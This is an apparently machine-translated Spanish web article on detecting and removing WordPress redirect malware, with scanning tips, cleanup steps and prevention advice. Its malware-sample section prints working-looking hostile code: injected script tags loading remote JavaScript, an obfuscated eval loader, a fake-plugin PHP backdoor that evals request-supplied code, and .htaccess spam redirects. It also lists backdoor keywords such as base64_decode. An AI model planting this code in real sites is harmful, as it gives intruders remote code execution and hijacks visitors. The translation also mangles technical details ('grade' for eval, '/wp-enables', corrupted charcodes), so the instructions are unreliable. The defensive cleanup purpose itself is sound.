✔️ AYUDANTE DE SEO | NICOLA.TOP

✔️ AYUDANTE DE SEO | NICOLA.TOP

¿Hackeo de redirección de WordPress? ¿Cómo limpiar un sitio web?

Número de vistas

3.075
imprimir · Время на чтение: 27мин · por · Publicada · Actualizado

jugarEscucha este artículo

WordPress está infectado con malware de redirección-redirección. Redirección maliciosa.

Redirección maliciosa de WordPressRedirección maliciosa a WordPress. Si su sitio web o panel de administración de WordPress redirige automáticamente a un sitio de spam, es probable que su sitio web haya sido pirateado e infectado con malware de redireccionamiento. Entonces, ¿qué puede hacer con un malware de redireccionamiento de WordPress pirateado en su sitio? En primer lugar, confirme si tiene un truco escaneando su

Es importante recordar que el tiempo es tu mejor amigo aquí. No pierdas el tiempo preocupándote por esto. Arreglaremos completamente el hack y su sitio podrá ser limpiado. Pero tienes que moverte rápido.

Lo guiaré a través de los pasos para ayudarlo a eliminar los redireccionamientos maliciosos de su sitio, arreglar su sitio y asegurarme de que no vuelva a suceder. Con múltiples variaciones del truco de redirección de WordPress, puede ser complicado llegar a la raíz. Este artículo lo ayudará a encontrar y eliminar rápidamente el malware paso a paso.

El contenido del artículo:

¿Qué significa una redirección pirateada (redirección maliciosa) en WordPress?

Una redirección de WordPress pirateada es una redirección maliciosa.
Redirección pirateada WordPress ocurre cuando se inyecta un código malicioso en su sitio web, que luego redirige automáticamente a sus visitantes a otro sitio web. Por lo general, el sitio web de destino contiene spam, productos farmacéuticos del mercado gris o servicios ilegales.

Hay muchos tipos de malware, como favicon malware, que provocan este comportamiento, por lo que WordPress malware redirect hack es un término genérico que se refiere al síntoma predominante: redireccionamientos maliciosos.

Este tipo de pirateo afecta a millones de sitios web y provoca pérdidas horrendas todos los días. Los sitios web están perdiendo ingresos, marcas y clasificaciones de SEO, sin mencionar el estrés de la recuperación.

Sin embargo, lo peor de la piratería es que sigue empeorando. El malware se propaga a través de archivos y carpetas e incluso de la base de datos de su sitio web, copiándose y usando su sitio web para infectar a otros.

Hablaré de las consecuencias específicas de un hackeo más adelante en este artículo, pero baste decir que su prioridad para salvar su sitio web es actuar de inmediato y no posponer las cosas.

¿Cómo sé si mi sitio de WordPress está siendo redirigido a spam?

Antes de solucionar el problema con redirigir un sitio de WordPress pirateado, primero debemos establecer que su sitio definitivamente ha sido pirateado. Al igual que con la infección, los hacks tienen síntomas. Y luego, una vez que haya identificado los síntomas, puede confirmar el diagnóstico con algunas pruebas.

Como se indicó anteriormente, las redirecciones automáticas son una señal segura de un hack de redirección de WordPress. Los redireccionamientos de spam pueden ocurrir desde los resultados de búsqueda, en páginas específicas o incluso cuando intenta iniciar sesión en su sitio web. El problema con los redireccionamientos es que no siempre ocurren de manera consistente o confiable.

Por ejemplo, si fue a su sitio y fue redirigido, es posible que no suceda la segunda, tercera o cuarta vez. Los piratas informáticos son inteligentes y configuran una cookie para asegurarse de que el problema solo ocurra una vez.

El resultado de esto es que es fácil caer en una falsa sensación de seguridad cuando sientes que podría ser un accidente. Existe una pequeña posibilidad de que esto pueda ser un error en el código, pero cuando digo "pequeño" me refiero a una probabilidad infinitesimal.

Verifique si hay signos de una redirección pirateada en WordPress

Como regla general, los hacks se manifiestan de diferentes maneras. Individualmente, estos podrían ser errores del sitio web, como un código de seguimiento antiguo, pero si ve dos o más de estos síntomas en su sitio web, puede estar seguro de que su sitio web ha sido pirateado.

  • El sitio de WordPress redirige a un sitio de spam: Un síntoma clásico de un hack de redirección de WordPress. Dependiendo de la variante de malware, la redirección puede ocurrir de diferentes maneras o en diferentes lugares de su sitio.
    Redirecciones automáticas: El malware redirige a sus visitantes automáticamente a sitios de spam cuando alguien visita su sitio. Esto también sucede si alguien visita su sitio desde Google o Yandex. Por lo general, también será redirigido si intenta iniciar sesión en su sitio.
    Redirección de enlace: Alguien hace clic en un enlace y luego es redirigido a otro sitio web. Esto es especialmente inteligente porque los visitantes hacen clic en enlaces esperando ser redirigidos a otra ubicación de todos modos.
    Redireccionamientos solo para dispositivos móviles: Solo si se accede a su sitio web a través de un dispositivo móvil, se redirige.
  • Los resultados de Google muestran el mensaje "Es posible que el sitio haya sido pirateado": cuando su sitio web aparece en los resultados de búsqueda, aparece un pequeño mensaje: "Es posible que el sitio haya sido pirateado"; aparecerá justo debajo del título. Esta es la forma en que Google alerta a los visitantes sobre un sitio potencialmente pirateado.
  • lista negra de google: La mayor bandera roja de todas, literalmente, la lista negra de Google es una señal segura de que su sitio ha sido pirateado. Incluso si sus visitantes utilizan un motor de búsqueda diferente, también utilizan la lista negra de Google para marcar los sitios pirateados.
  • Prohibición del sitio en Yandex: también una señal segura de un sitio web pirateado, las posiciones de su sitio web aparecerán en los resultados de búsqueda de Yandex. Quizás la página principal se mantenga, pero esto no es un hecho.
  • Google Ads marca las secuencias de comandos en su sitio web: si intenta anunciarse en su sitio web, Google Ads rastreará su sitio web y le advertirá sobre escenarios de redireccionamiento en sus publicaciones o páginas.
  • El proveedor de alojamiento web ha suspendido su cuenta: Los sitios web suspenden los sitios web por varios motivos, y el malware es uno de los principales. Si ve este mensaje cuando intenta acceder a su sitio web, revise su correo electrónico por alguna razón. Alternativamente, póngase en contacto con su equipo de soporte.
  • La gente se queja de su sitio: La parte terrible de los hacks es que los administradores de sitios web suelen ser los últimos en enterarse de un hack, a menos que tengan instalado un buen complemento de seguridad. Mucha gente se entera de esto porque los visitantes y usuarios del sitio web se quejan de que el sitio web es redirigido a spam o incluso recibe correo basura.

Si observa alguno de los síntomas enumerados anteriormente, es una buena idea anotar información al respecto. ¿Qué navegador usaste? ¿Qué dispositivo usaste? Esta información puede ayudar a identificar el tipo de malware de piratería de WordPress al que se enfrenta y, por lo tanto, eliminarlo más rápido.

Confirme si su sitio está infectado con un truco de redirección

El siguiente paso para descubrir el síntoma es asegurarse de que se trate de un hackeo. La forma más rápida de asegurarse de que su sitio web sea susceptible a redireccionamientos maliciosos es escanear su sitio web.

1. Escanee su sitio con un complemento de seguridad

Si aún no está seguro en 100 % de que su sitio web ha sido pirateado, use un escáner en línea gratuito para confirmar. Un caso muy común es acceder a tu sitio web desde un dispositivo móvil, lo que indica malware en el archivo .htaccess. O uno que vemos a menudo es un pirateo de página que redirige automáticamente. Esto sucede cuando hay malware en la base de datos.

Más adelante en el artículo, veremos otras variantes de malware. En este momento, quiero enfatizar que el malware directo secuestrado por WordPress puede estar en casi cualquier lugar de su sitio.

Debido a esto, cada escáner lo etiquetará de manera diferente. Por ejemplo, Quttera marcará el malware de la siguiente manera:

Nombre de la amenaza: Heur AlienFile gen

Y WordFence mostrará una advertencia sobre un montón de archivos desconocidos, como este:

* Archivo desconocido en el núcleo de WordPress: wp-admin/css/colors/blue/php.ini
* Archivo desconocido en el núcleo de WordPress: wp-admin/css/colors/coffee/php.ini
* Archivo desconocido en el núcleo de WordPress: wp-admin /css/colors/ectoplasm/php.ini

Estas son buenas señales de que su sitio ha sido pirateado porque, como veremos más adelante, la carpeta /wp-admin debería contener nada más que los archivos principales de su instalación de WordPress.

Habiendo dicho eso, desafortunadamente no ayuda para la desinstalación. Hay varios problemas importantes con la forma en que otros complementos de seguridad marcan el malware debido a sus mecanismos de detección. Hay muchos falsos positivos, archivos perdidos y muchos otros problemas. Su sitio web es importante, así que elija sabiamente su complemento de seguridad.

2. Escanee con un escáner de seguridad en línea

También puede usar un escáner de seguridad en línea como Sucuri SiteCheck para verificar si hay malware de redirección pirateado. Un escáner de seguridad en línea o un escáner externo escanea el código en sus páginas y publicaciones en busca de scripts maliciosos.

El único problema con un escáner frontal es que puede y solo escaneará el código al que tiene acceso. Es decir, básicamente el código fuente de páginas y publicaciones. Aunque hay muchos malware de redirección pirateados en estas páginas, hay algunas opciones en los archivos principales. El escáner externo no los mostrará en absoluto.

Recomiendo usar un escáner de seguridad en línea como herramienta de diagnóstico de primera línea. Si resulta positivo, puede estar seguro de que es positivo y trabajar para arreglar el truco. Si resulta negativo, puede verificar manualmente los lugares no escaneados por el escáner frontal. De esta manera, puede eliminar parte del trabajo manual.

3. Escanee el sitio en busca de malware manualmente

Si está utilizando un complemento de seguridad para buscar malware de redireccionamiento pirateado, puede omitir esta sección por completo. Un buen complemento de seguridad hará exactamente lo que sugiero a continuación, pero mucho más rápido y mejor.

Escanear su sitio web en busca de malware significa esencialmente buscar código no deseado en archivos y bases de datos. Entiendo que el "código basura" es inútil como referencia, pero debido a las opciones, no hay una sola línea que pueda encontrar rápidamente y anunciar un truco.

Sin embargo, en la siguiente sección, he enumerado algunos ejemplos de malware que se encuentran en otros sitios web. Y en la siguiente sección, hablaremos sobre los lugares típicos donde se inyecta malware, según el comportamiento de redireccionamiento observado.

Cómo se ve el malware de redirección de WordPress

Estoy exagerando esa línea en este artículo, pero el malware de redireccionamiento de pirateo de WordPress tiene muchas opciones, por lo que no hay un fragmento de código estándar único para señalar, "¡Busque esto!"

Sin embargo, puedo darte una idea de cómo se ven algunos códigos maliciosos:

  • El código puede estar en algún lugar del encabezado de la página o en todas las páginas de la tabla wp_posts. Aquí hay unos ejemplos:

 

type='text/javascript' src='//www.dekeine.nl/wp-content/count.php?s=8131599557550&ver=5.7.2' id='hello_newscript5-js'>
 type='text/javascript' src='https://store.don/tkinhoo/ot./tw/m.js?w=085'>
 type='text/javascript' async src='https://db.d/live/rygoo/stra/tegy./com/js.min.js?s=p&'>
 type='text/javascript' src='https://coun/.tr/acks/tatis/icsss/./com/stm?v=l6.0.0'>
 type=text/javascript src='https://des/.coll/ectf/at/rac/ks./com/t.js'>
 src='https://js/donatel/firstly.ga/stat.js?n=ns1' type='text/javascript'>
  • Las tablas wp_options pueden tener URL desconocidas en site_url. Aquí hay unos ejemplos:
stat/traksatiticss dest/colecfattracks gotosend ws.stienernando

 

  • Los scripts también se pueden ofuscar, lo que significa que debe ejecutarlos a través de un desofuscador en línea para extraer el código real.

código ofuscado

eval(StringfromCharCode32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116, 39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,399111111111111110,32,32,32 años. 99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32,32,118, 97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10,32,32, 32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,1111,44,32,115,41,591111,11,11,11,11,11 años.

Y qué significa realmente:

(function() var po = document.createElement('script'); po.type = 'text/javascript'; po.src = eloperatss.sat?v=n4'; var s = document.getElementsByTagName('script') [0];s.parentNode.insertBefore(po, s); )();
  • Los complementos falsos pueden tener archivos que se ven así cuando se abren:
<?php /** * Plugin Name: Wp Zzz * Plugin URI: https://wpforms.com * Description: Default WordPress plugin * Author: WPForms * Author URI: https://wpforms.com * Version: 1.6.3.1 * */ function simple_init() { $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}} } add_action('init','simple_init'); function my_custom_js() { echo ' '; } add_action('admin_head', 'my_custom_js'); add_action('wp_head', 'my_custom_js');
  • Las redirecciones móviles indican cambios en el archivo .htaccess. El siguiente código redirige a https://daily-prize-best /life/?u=y2ykaew&o=2xup89r&m=1&t=mns2.
RewriteEngine en RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.html$ https:/ /bit.ly/3iZl8mm [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . https://bit.ly/3iZl8mm[L] RewriteEngine en RewriteBase/RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . índice.php[L]

Lugares para buscar malware redirigido

WordPress se divide en dos partes principales: archivos y base de datos. El problema con el malware de redireccionamiento pirateado es que puede estar en cualquier lugar.

Si está familiarizado con la modificación del código de su sitio web, puede encontrar el código de redirección que mencioné en los siguientes lugares. Descargue una copia de seguridad de su sitio web, tanto de los archivos como de la base de datos, para buscar complementos sospechosos.

Nuevamente, tenga en cuenta que hay opciones como redireccionamientos clásicos, situacionales, específicos del dispositivo o incluso agrupados. El código será diferente para cada uno, al igual que la ubicación.

A. Archivos del sitio web

  • Archivos principales de WordPressR: Comenzando con los más simples, /wp-admin y /wp-includes no deberían ser diferentes de una nueva instalación de WordPress. Lo mismo ocurre con los archivos index.php, settings.php y load.php. Estos son los archivos principales de WordPress y la configuración no les hace ningún cambio. Compare con una instalación nueva de WordPress para ver si hay algún cambio. El archivo .htaccess es un caso especial. Un truco de redirección móvil casi siempre aparecerá en este archivo. Busque la regla del agente de usuario que define el comportamiento específico del dispositivo y verifique el script de redirección.
  • Archivos de temas activos: Si tienes más de un tema instalado (lo cual no es recomendable para empezar), asegúrate de que solo uno de ellos esté activo. Luego, revise sus archivos de temas activos, como header.php, footer.php y functions.php en busca de códigos extraños. Una buena manera de probar esto es descargar instalaciones prístinas de los sitios de los desarrolladores y comparar el código con esos archivos. Por lo general, estos archivos deben estar en un formato específico, razón por la cual el código basura sobresale. Tenga en cuenta que la configuración también cambiará el código. Además, si está utilizando temas o complementos anulados, puede detener el diagnóstico aquí mismo, porque podemos asegurarle que ha sido pirateado debido a ellos.
  • Complementos falsos en su sitio: Sí, este es el caso. Los piratas informáticos enmascaran el malware, haciéndolo lo más legítimo posible. Vaya a la carpeta wp-content/plugins y eche un vistazo. ¿Algo que no hayas instalado? ¿Algunos duplicados extraños? ¿Alguno de ellos solo tiene uno o dos archivos en sus carpetas?

Aquí hay unos ejemplos:

/wp-content/plugins/mplugin/mplugin.php /wp-content/plugins/wp-zzz/wp-zzz.php /wp-content/plugins/Plugin/plug.php

Si tiene muchos complementos instalados, puede ser difícil verificarlos todos. La regla general para detectar complementos falsos es que, por convención, los nombres de complementos legítimos rara vez comienzan con una letra mayúscula, y sus nombres no contienen caracteres especiales más que guiones. Estas no son reglas, sino convenciones. Por lo tanto, no les dé demasiada importancia para identificar definitivamente las falsificaciones. Si sospecha que un complemento es falso, búsquelo en Google y busque la versión original en el repositorio de WordPress. Descárguelo desde allí y verifique si los archivos coinciden.

B Base de datos

  • tabla wp_posts: Las secuencias de comandos maliciosas suelen estar presentes en todas las páginas. Pero, como ya hemos dicho, los hackers son muy astutos. Echa un vistazo a una buena muestra de publicaciones antes de decidir que no existe un truco. Otra forma de verificar el código de sus páginas y publicaciones es verificar el código fuente de la página usando un navegador. Cada página de su sitio tiene un código HTML que los navegadores pueden leer. Abra el código fuente de la página y verifique el encabezado, el pie de página y todo lo que se encuentra entre las etiquetas del script en busca de cosas que parezcan fuera de lugar. La sección del encabezado contiene información que el navegador usa para cargar esa página, pero que no se muestra al visitante. Los scripts de malware a menudo se ocultan aquí, por lo que se cargan antes que el resto de la página.
  • tabla wp_options: ver URL del sitio. Esta debería ser la URL de su sitio web en los casos 99%. Si no es así, este es tu truco aquí.

Sin embargo, ahora no es el momento de intentar eliminar nada. Debe estar completamente seguro de que los scripts Javascript o PHP son definitivamente maliciosos. Desea deshacerse del malware muy rápidamente, pero las prisas lo llevarán a un sitio que está inactivo.

Otras formas de buscar redireccionamientos de malware

Es posible que no vea todos los síntomas enumerados anteriormente como administrador del sitio web. Los piratas informáticos excluyen astutamente su IP y su cuenta para que no vean los resultados de un ataque porque quieren pasar desapercibidos el mayor tiempo posible.

Además, es posible que vea el síntoma una vez y luego no pueda volver a crearlo. Todo esto es muy confuso. Hay varias otras formas de verificar los síntomas si no los ve directamente en su sitio web.

  • Compruebe la consola de búsqueda de Google: Marcarán la infección de malware en la sección Problemas de seguridad.
  • Utilice un navegador de incógnito para acceder a su sitio webpara ver lo que ve el visitante medio
  • Verifique los registros de actividad en busca de actividad inusual del usuario, como elevar los privilegios de los usuarios o redactar mensajes.

La siguiente sección trata exclusivamente de la eliminación. Tome una respiración profunda y tome una taza de té o café. Repasemos todo el proceso juntos.

¿Cómo eliminar la infección de redirección pirateada de WordPress?

Ahora que sabemos que su sitio web está redirigiendo a otro sitio, debe actuar rápidamente. A medida que pasa el tiempo, la cantidad de hacks aumenta exponencialmente porque el malware se propaga a más archivos y carpetas en su sitio web. Esto no solo aumenta el daño, sino que también hace que la recuperación sea mucho más difícil.

Supongo que ya ha rastreado su sitio web antes de llegar a esta sección. Sin embargo, si no lo ha hecho, lo primero que debe hacer es rastrear su sitio web.

Hay 2 formas principales de eliminar los redireccionamientos maliciosos de su sitio. Recomiendo encarecidamente usar el complemento de seguridad, ya que he visto de primera mano el daño que los hacks pueden causar en un sitio web.

1. (RECOMENDADO) Use un complemento de seguridad para eliminar el virus de redirección

Los complementos de seguridad se utilizan para eliminar malware difícil de detectar. Todo lo que tiene que hacer es instalar el complemento en su sitio y esperar unos minutos para que se restaure su sitio.

Si ha utilizado un escáner para confirmar que su sitio web ha sido pirateado, todo lo que tiene que hacer es actualizarlo y recuperar su sitio.

Hay varias razones por las que se recomienda utilizar dichos complementos:

  1. Elimine solo el malware y deje su sitio intacto;
  2. Encuentre las puertas traseras que los piratas informáticos dejan para volver a infectarlas y también elimínelas;
  3. Cortafuegos incorporado para proteger su sitio del tráfico malicioso.

Si no puedes acceder a wp-admin

En este caso, póngase en contacto con el servicio de eliminación de malware de emergencia para obtener ayuda. Un experto en seguridad dedicado limpiará rápidamente su sitio web y se asegurará de que vuelva a funcionar en poco tiempo.

2. Eliminar manualmente el malware de redirección de WordPress

Es posible eliminar el malware de redireccionamiento manual de su sitio web, pero existen requisitos previos para hacerlo.

- Primero, necesitas saber cómo está configurado WordPress. Desde cómo se ven los archivos principales hasta las carpetas y los archivos que cada complemento y tema crea para trabajar. Eliminar un archivo necesario puede colapsar su sitio, por lo que su sitio no solo es pirateado, sino también deshabilitado.

- En segundo lugar, debe poder distinguir el código bueno del malo, es decir. programa malicioso El código malicioso se disfraza como código legítimo o se ofusca para que no se pueda leer. Es muy difícil distinguir un código bueno de un código malo, razón por la cual muchos escáneres sufren falsos positivos.

NotaR: Puede contratar a un experto en WordPress para eliminar el malware. Tenga en cuenta que los expertos en seguridad son caros y tardarán en eliminar un hack.

Además, no garantizan que no recaiga. Sin embargo, sigo recomendando este curso de acción en lugar de intentar eliminar el malware manualmente.

Bien, esas son las advertencias. Estos son los pasos para eliminar el malware de redireccionamiento de su sitio web:

1. Haz una copia de seguridad de tu sitio

Asegúrate de hacer una copia de seguridad antes de hacer nada. Incluso si el sitio es pirateado, todavía funciona. Entonces, si algo sale mal durante el proceso de eliminación de malware, tiene una copia de seguridad a la que volver. Un sitio pirateado es difícil de limpiar. Un sitio web roto es aún más difícil de limpiar y, a veces, imposible de recuperar.

El proveedor de alojamiento web puede suspender su sitio o incluso eliminarlo. Luego, obtener acceso a su sitio web, incluso para rasparlo, es un problema importante. Deberá ponerse en contacto con el equipo de soporte del host web para acceder al sitio suspendido, pero un sitio eliminado no se puede hacer sin una copia de seguridad.

2. Descarga una versión limpia de WordPress

Descargue instalaciones nuevas de WordPress, así como cualquier complemento y tema que use. Las versiones deben coincidir con lo que está en su sitio.

Después de descargarlos, puede usar los archivos en blanco para compararlos con los archivos de su sitio web. Puede usar el verificador de diferencias en línea para encontrar las diferencias, porque ciertamente no recomendamos revisarlas manualmente.

Esencialmente, esto es coincidencia de firmas, que es lo que hacen la mayoría de los escáneres de seguridad. Sin embargo, al menos ahora sabe qué archivos y carpetas se requieren para que su sitio funcione correctamente. No elimine nada en esta etapa. Simplemente establece la línea de base para comprender qué archivos se necesitan.

3. Busque y elimine el malware de redirección

Este es quizás el paso más difícil del proceso. Como dije, debe poder distinguir el código bueno del código malo y luego eliminarlo o reemplazarlo según sea necesario.

Limpiar archivos básicos de WordPress

Es extremadamente importante obtener la misma versión de WordPress que su sitio web, de lo contrario, puede experimentar un bloqueo del sitio web. Una vez cargado, use cPanel o FTP para acceder a los archivos de su sitio web y reemplace las siguientes carpetas:

— /wp-admin
/wp-enables

Estas carpetas son utilizadas por WordPress para ejecutar y cargar su sitio web y no están destinadas a almacenar contenido de usuario en absoluto. Esta fue la parte fácil. Ahora revise los siguientes archivos en busca de código extraño:

- index.php
wp-config.php
— wp-settings.php
- wp-load.php
- .htaccess

Además, no debe haber scripts PHP en la carpeta /wp-uploads. Me doy cuenta de que el "código extraño" es muy vago, pero como dijimos antes, un malware de redirección de WordPress pirateado tiene muchas, muchas opciones.

Como tal, no puedo decirle exactamente qué código verá en ninguno de esos archivos. Si comprende cómo funciona el código, puede consultar la lista de archivos de WordPress para comprender qué hace cada uno y ver si alguno de los códigos hace algo diferente. Una vez que esté seguro de haber encontrado este código, elimínelo.

Limpia temas y plugins de malware

Todos los archivos y carpetas asociados con el tema y el complemento se almacenan en la carpeta /wp-content. Puede verificar cada uno de los archivos de su sitio web para ver dónde hay una diferencia en el código.

Una palabra de precaución aquí: no todos los cambios son malos. Si ha personalizado alguno de sus complementos o temas, que probablemente tenga, entonces habrá diferencias con respecto a una instalación limpia. Si no le importa perder esa configuración, puede continuar y reemplazar los archivos de forma masiva.

Es probable que desee mantener el trabajo que ha realizado, así que comience a observar cada una de las diferencias con cuidado. Si puede seguir la lógica del código, podrá comprender cómo interactúan los archivos entre sí y con el resto de su sitio. Esto debería permitirle encontrar el malware y eliminarlo.

Si tiene una cantidad significativa de temas y complementos, esta puede ser una tarea desalentadora. Aquí hay algunos buenos lugares para comenzar:

  • Archivos de temas activos
    - header.php
    — footer.php
    — functions.php
  • Complementos vulnerables
    - ¿Alguien ha sido hackeado recientemente?
    - ¿Hay alguno no actualizado?
  • Complementos falsos
    - Muy pocos archivos
    - Duplicados obvios

Algunos archivos maliciosos parecen inofensivos y suelen imitar nombres de archivos reales. Aquí es donde las instalaciones limpias son útiles, pero también comuníquese con los desarrolladores de complementos y temas para obtener asistencia si no está completamente seguro.

Eliminar malware de la base de datos de WordPress

Use phpMyAdmin para cargar la base de datos para limpiarla. Luego revise las tablas en busca de contenido sospechoso, como URL de spam o palabras clave. Elimine este contenido con cuidado, asegurándose de que sea un código incorrecto y no un código modificado bueno.

Verifique las siguientes tablas en particular:

— wp_options
— wp_posts

Dependiendo del tamaño de su sitio web, esto puede tomar una cantidad significativa de tiempo. Generalmente, si el malware está en su tabla wp_posts, estará en cada publicación. Si tiene cientos de publicaciones con mucho contenido, entonces es una tarea monumental limpiar manualmente.

Sin embargo, una vez que haya identificado el script de malware, puede usar SQL (o pedirle a alguien que entienda SQL) que elimine el script de cada mensaje. La advertencia aquí es que no puede estar seguro de que este sea el único malware sobre la mesa.

Además, especialmente con los sitios de comercio electrónico, verifique dos veces si está eliminando información importante del usuario o del pedido.

4. Elimina las puertas traseras

Ahora que ha limpiado su sitio web de malware, busque puertas traseras. Estos son puntos de entrada a su sitio web que un pirata informático deja atrás para que puedan volver a infectar su sitio web si se descubre su pirateo original.

Las puertas traseras pueden estar en varios lugares. Algo de código para buscar:

  • grade
  • base64_decode
  • gzinflate
  • preg_replace
  • str_rot13

Una palabra de precaución: no son necesariamente todos malos. Estos son scripts PHP legítimos que pueden modificarse ligeramente para que sirvan como puertas traseras. Tenga cuidado al eliminar cualquiera sin un análisis adecuado.

5. Vuelva a cargar archivos limpios

Ahora que eliminó el truco, debe volver a armar su sitio. Use un administrador de archivos para volver a cargar archivos y phpMyAdmin en cPanel o VestaCP para reemplazar su sitio web.

Esto es muy similar a cómo restaura manualmente una copia de seguridad y significa que primero debe eliminar los archivos y la base de datos existentes. Si omitió accidentalmente el paso de copia de seguridad al principio, hágalo ahora. Hacer una copia de seguridad de su sitio web, incluso uno pirateado, le evitará molestias si algo sale mal.

6. Borrar caché del sitio

Ahora que su sitio web limpio está cargado, borre su caché. El caché almacena versiones anteriores de sus páginas y contenido y los muestra a los visitantes de su sitio. Para que su sitio recién limpiado se comporte como se espera, debe borrar el caché.

7. Revisa cada uno de los plugins y temas

Lo triste del malware es que puede esconderse en casi cualquier lugar. Ya que ha gastado todo ese tiempo y energía limpiando manualmente su sitio web, vale la pena tomarse unos minutos adicionales para asegurarse de que sus esfuerzos sean un éxito.

Le recomiendo que use FTP para esto, ya que requerirá mucho trabajo para cambiar los archivos del sitio web.

  • Deshabilite todos sus complementos y temas cambiando el nombre de la carpeta wp_contents a otra cosa.
  • Luego, actívelos uno por uno, cada vez que revise su sitio en busca de una redirección.
  • Si no hay problemas, sabe que los complementos y temas no contienen malware.

Por qué desaconsejo encarecidamente eliminar los redireccionamientos de piratas informáticos manualmente

Quizás se pregunte por qué no recomiendo eliminar los hacks de esta manera. Piense en los hacks de la misma manera que pensaría en una enfermedad, como el cáncer o un hueso roto.

Prefiere dejar el cuidado de estas enfermedades en manos de médicos que son profesionales capacitados con amplia experiencia en el tratamiento de las mismas. Las personas sin formación hacen más daño que bien. Pregúntele a cualquier médico que haya tenido que lidiar con una fractura ósea mal curada.

Hay algunas cosas que pueden salir mal al eliminar manualmente un hack:

  • El software malicioso puede propagarse a lugares inesperados y es difícil de eliminar sin errores.
  • Eliminar el malware por sí solo no es suficiente si no se corrigen las vulnerabilidades y/o las puertas traseras.
  • La eliminación inepta a veces puede romper otras partes del sitio web.
  • Los sitios grandes (por ejemplo, tiendas de comercio electrónico) serán muy difíciles y consumirán mucho tiempo para pasar manualmente.
  • El tiempo es esencial, ya que los hacks empeoran exponencialmente con el tiempo.
  • Es posible que no pueda acceder a su sitio web si el host ha prohibido su cuenta

En pocas palabras, hay un gran margen de error en un sitio web pirateado. Existe un peligro muy real de salir de este proceso en una posición peor de la que comenzó. Lo mejor es usar un buen complemento de seguridad para eliminar los scripts de hackers.

El sitio web está siendo redirigido a spam: ¿cómo ha afectado esto a mi sitio web?

Los sitios web son mezclas complejas de software y, en esencia, ningún software se puede piratear en el 100%. Esta es la realidad de cualquier software, desde los juegos de 8 bits de antaño hasta los enormes sistemas de información de gestión que utilizan los bancos.

Los sitios web de WordPress no son diferentes. Si bien los archivos principales de WordPress están más cerca de ser a prueba de balas, no se puede decir lo mismo de los complementos y temas. Los complementos y temas agregan elementos dinámicos, funcionalidad y diseño a los sitios web, y un sitio sin ellos sería seguro, pero también estático y aburrido.

Aquí hay una lista de razones por las que los sitios de WordPress son pirateados:

  1. Vulnerabilidades en complementos y temas;
  2. Malas contraseñas y cuentas de usuario comprometidas;
  3. Puertas traseras en temas y complementos anulados;
  4. ataques de secuencias de comandos XSS;
  5. Ataques de fuerza bruta con bots.

Como se indicó anteriormente, la seguridad del sitio web no debe tomarse a la ligera. Ahora tiene experiencia de primera mano de lo difícil que es arreglar un hack, por lo que idealmente debería tener una estrategia para asegurarse de que no vuelva a suceder.

¿Cómo prevenir hacks de redirección de WordPress en el futuro?

Ahora que tiene un sitio web limpio, los siguientes pasos son evitar que su sitio web de WordPress sea redirigido a spam.

Los hacks se repiten todo el tiempo. Esto se debe principalmente al hecho de que la razón por la que su sitio fue pirateado no se ha solucionado. Para evitar que se repita, se deben seguir los siguientes pasos:

1. Instalar el complemento de seguridad: elija un buen complemento de seguridad que pueda escanear, limpiar y evitar ataques. Estos complementos tienen un firewall incorporado que bloquea de manera proactiva el tráfico dañino para que no llegue a su sitio.
2. Cambiar todas las contraseñas de los usuarios y la base de datos: Las cuentas de usuario comprometidas y las contraseñas fáciles de adivinar son la segunda razón de los ataques a sitios web.
3. Restablecer y verificar cuentas de usuario: verifique las cuentas de usuario con acceso de administrador innecesario y elimínelas.
4. Cambiar roles + claves de seguridad: los roles y las claves de seguridad son cadenas largas que WordPress adjunta a los datos de inicio de sesión de las cookies para ayudar a los usuarios a permanecer conectados de forma segura. Puede cambiarlos en su archivo wp-config.php después de usar el generador de WordPress para obtener otros nuevos.
5. Asegúrese de usar solo complementos y temas probados: He dicho esto antes, pero vale la pena repetirlo. Use solo complementos y temas de desarrolladores confiables. Estos desarrolladores brindarán soporte y actualizaciones que son increíblemente importantes para la seguridad. Bajo ninguna circunstancia debe usar temas y complementos vacíos. Lo que guardes, lo perderás muchas veces debido al inevitable hackeo.
6. Asegúrate de tener SSLR: Idealmente, ya debería tener SSL en su sitio web, pero lo incluimos para que esté completo. SSL garantiza que la comunicación hacia y desde el sitio web esté encriptada. Google también está impulsando este cambio con fuerza y pronto comenzará a ver penalizaciones de SEO si aún no lo ha hecho si SSL no está habilitado en su sitio web.
7. Proteger WordPress: Existen medidas de refuerzo de seguridad comúnmente conocidas como endurecimiento de WordPress. Me gustaría advertirle que no se olvide de seguir los buenos consejos disponibles en Internet. Algunos de ellos no funcionan por completo y afectarán su sitio y la experiencia del visitante.
8. Tener un plan de seguridad/acciones que se deben realizar regularmente: no basta con hacer una sola cosa una vez y olvidarse de ella. Como mínimo, verifique a los usuarios regularmente y solicite restablecimientos de contraseña. Establecer un registro de actividad también es una buena idea, ya que facilita y acelera el seguimiento de la actividad del usuario, que a menudo puede ser una señal de advertencia temprana de un sitio pirateado.
